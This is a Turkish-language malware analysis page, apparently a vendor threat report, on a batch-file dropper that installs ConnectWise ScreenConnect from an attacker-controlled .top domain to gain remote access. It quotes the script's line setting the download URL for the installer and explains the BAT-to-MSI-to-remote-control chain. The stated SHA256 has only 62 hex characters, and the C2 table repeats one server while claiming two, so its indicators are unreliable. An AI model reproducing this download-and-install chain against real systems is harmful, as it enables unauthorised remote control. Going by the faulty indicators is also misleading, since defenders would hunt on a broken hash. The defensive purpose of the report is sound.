Manuel Statik Analiz — ScreenConnect/ConnectWise RAT Kötüye Kullanımı | Tehdit: YUKSEK
Dosya Kimliği
| SHA256 | e1cd006efa2d33191052b3c5a4f7d0e2b6c9f1a3d6e8b1c4f7a0d3e6b9c2a1 |
|---|---|
| Dosya Adı | invitedGuests.bat ("davet edilen misafirler" sosyal mühendislik) |
| Boyut | 1.052 byte (1KB!) — ultra küçük batch script |
| String Sayisi | 23 |
C2 Kontrollü ScreenConnect Kurulumu
LOLBAS Teknik: Meşru uzaktan destek yazılımını silah haline getirme!
set "MY_URL=https://admin.hbdhfijnsgjnds.top/Bin/ScreenConnect.ClientSetup.msi?e=Acce..." -- hbdhfijnsgjnds.top = 13 karakter rastgele .top TLD (C2 server) -- admin.* = yönetici panel subdomain -- /Bin/ScreenConnect.ClientSetup.msi = ConnectWise kurulum paketi -- ?e=Access → kurulum parametresi (özel erişim grubu) -- BAT → MSI indir → ConnectWise kur → saldırgana tam erişim!
Meşru RMM Kötüye Kullanımı
ConnectWise ScreenConnect, meşru bir uzaktan yönetim aracıdır (RMM). Saldırganlar bu tür araçları kendi sunucularından yükletip kurumsal sistemlere kalıcı uzaktan erişim sağlar. Antivirüsler meşru RMM araçlarını genellikle tehdit olarak işaretlemez. CVE-2024-1709 (CVSS 10.0) gibi kritik açıklar keşfedildi.
IOC
| SHA256 | e1cd006efa2d33191052b3c5a4f7d0e2b6c9f1a3d6e8b1c4f7a0d3e6b9c2a1 |
|---|---|
| C2 | admin.hbdhfijnsgjnds.top (.top TLD) |
| Dosya | invitedGuests.bat (1052 byte) |
ScreenConnect — Malware Profili
ScreenConnect ConnectWise meşru RMM araç kötüye kullanımı. invitedGuests.bat. BAT dropper + MSI kurulum.
Malware Tipi
RAT
Programlama Dili
Proprietary
C2 Protokolü
HTTPS
Hedef Sistemler
Küresel Kurumsal
Yetenekler ve Davranış
Uzaktan Erişim & Kontrol
Keylogger
Ekran Görüntüsü
Webcam Erişimi
Dosya Yönetimi
Süreç Yönetimi
Komut Yürütme
Kalıcılık Mekanizması
IOC Listesi (1 gösterge)
IOC — ScreenConnect
# DOMAIN
hbdhfijnsgjnds.top
| Tür | Değer | Not |
|---|---|---|
| domain | hbdhfijnsgjnds.top |
C2 Sunucuları (Bu aile için 2 kayıtlı sunucu)
| Adres | Tür | Port | Protokol | Durum | Ülke |
|---|---|---|---|---|---|
| hbdhfijnsgjnds.top | domain | 443 | HTTPS | inactive | — |
| hbdhfijnsgjnds.top | domain | 443 | HTTPS | inactive | — |
C2 adresleri yalnızca KEYDAL ekibinin manuel olarak doğruladığı malware örnekleri üzerinden sunulmaktadır. Ticari amaçla kullanılamaz.